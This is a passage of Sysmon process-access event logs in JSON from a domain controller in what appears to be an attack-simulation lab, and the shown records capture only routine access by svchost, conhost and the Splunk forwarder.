C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1955,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1956,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1957,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1958,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1959,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1960,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1961,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.656\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001012D60300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.656","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001012D60300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1962,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.891\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-001012D60300}\r\nSourceProcessId: 3948\r\nSourceThreadId: 3952\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.891","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-001012D60300}","SourceProcessId":"3948","SourceThreadId":"3952","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 